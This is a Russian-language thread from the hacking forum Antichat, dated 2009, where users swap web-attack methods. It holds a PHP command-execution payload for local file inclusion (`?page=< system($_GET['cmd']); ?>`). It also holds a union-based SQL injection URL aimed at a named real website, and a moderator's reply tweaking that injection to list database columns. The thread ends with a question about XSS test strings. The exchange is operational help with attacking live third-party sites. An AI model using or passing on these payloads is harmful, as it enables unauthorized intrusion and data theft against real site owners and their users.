Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
22.12.2009, 14:54
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
конструкция с /etc/passw%00< system($_GET['cmd']); ?>
тоже катит!!!
Тоже катит, разумеется, но /etc/passw%00 - тут просто лишний текст в нагрузку. Для инклуда, он не является ни необходимым ни хоть сколько нибудь полезным.
а если не пишется (чото даже ни разу такого не встречал)
Встречал случаи, когда в сессию пишется туча разного бреда, в том числе и некоторые входящие параметры. И при этом не заинклудить ни логи, ни что либо ещё, кроме сессии и файлов движка.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
22.12.2009, 14:55
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от 547
ну да для начала именно это и следует выяснить што там в куки пишется  в куках может быть только идентификатор сессии и всё, но мыло и другие данные, введенные при регистрации, например, могут быть отображены в сессии при её инклуде
|
|
|
|
22.12.2009, 14:56
|
|
Banned
Регистрация: 19.12.2009
Сообщений: 4
Провел на форуме:
8941
Репутация:
0
|
|
Подкажите плиз. как получить все колнки или столбцы если group_concat() не всё выводит
http://www.gexecutives.com
/job.php?ID=-208+union+select+1,2,3,4,5,6,7,8,group_concat%28co lumn_name%29,10,11,12,13,14,15,16,17,18+from+infor mation_schema.columns--
|
|
|
|
22.12.2009, 14:58
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
вообщем наконец все поняли што я вас необманую...
да /etc/passwd необязательная конструкция...
но она проходит..
писал просто для наглядности...
Последний раз редактировалось 547; 22.12.2009 в 15:00..
|
|
|
|
22.12.2009, 15:00
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
вообщем наконец все поняли што я вас необманую...
да /etc/passwd необязательная конструкция...
но она проходит..
практически никогда, в 1 случае из 1000 может быть, так что польза от такой инфо стремится к нулю
|
|
|
|
22.12.2009, 15:04
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
Сообщение от Pashkela
практически никогда, в 1 случае из 1000 может быть, так что польза от такой инфо стремится к нулю
тыже толькошто писал што никогда неслышал про такую уязвимость
а тут уже пишеш как будто ты ее 1000 раз юзал
штото тут попахивает.....
|
|
|
|
22.12.2009, 15:07
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
Сообщение от 547
вообщем наконец все поняли што я вас необманую...
да /etc/passwd необязательная конструкция...
но она проходит..
писал просто для наглядности...
Для наглядности чего? Объясни плз в каком случае нужно использовать именно твой вариант, при инклуде из сессии.
Т.е. когда нужни использовать:
?page=/etc/passw%00< system($_GET['cmd']); ?>
и невозможно использовать просто вот это:
?page=< system($_GET['cmd']); ?>
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
Последний раз редактировалось Qwazar; 22.12.2009 в 15:10..
|
|
|
|
22.12.2009, 15:12
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от Матня
Подкажите плиз. как получить все колнки или столбцы если group_concat() не всё выводит
Юзай LIMIT
|
|
|
|
22.12.2009, 15:13
|
|
Moderator - Level 7
Регистрация: 07.06.2006
Сообщений: 556
Провел на форуме:
7549607
Репутация:
2702
|
|
Сообщение от Матня
Подкажите плиз. как получить все колнки или столбцы если group_concat() не всё выводит
/job.php?ID=-208+union+select+1,2,3,4,5,6,7,8,group_concat(colu mn_name),10,11,12,13,14,15,16,17,18+from+infor mation_schema.columns+and+column_name>'some_column'--
|
|
|
|
22.12.2009, 16:02
|
|
Познающий
Регистрация: 21.12.2009
Сообщений: 34
Провел на форуме:
124940
Репутация:
1
|
|
Всем привет. Я xss недавно начал изучать. Подскажите <script>alert()</script> я вбиваю вообще в любое поле на сайте? Так?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [x26]VOLAND](/avatars/avatar24925.jpg?1774505){kind=avatar}
![Отправить сообщение для [x26]VOLAND с помощью AIM](fusion/misc/im_aim.gif)
Похожие темы
Линейный вид
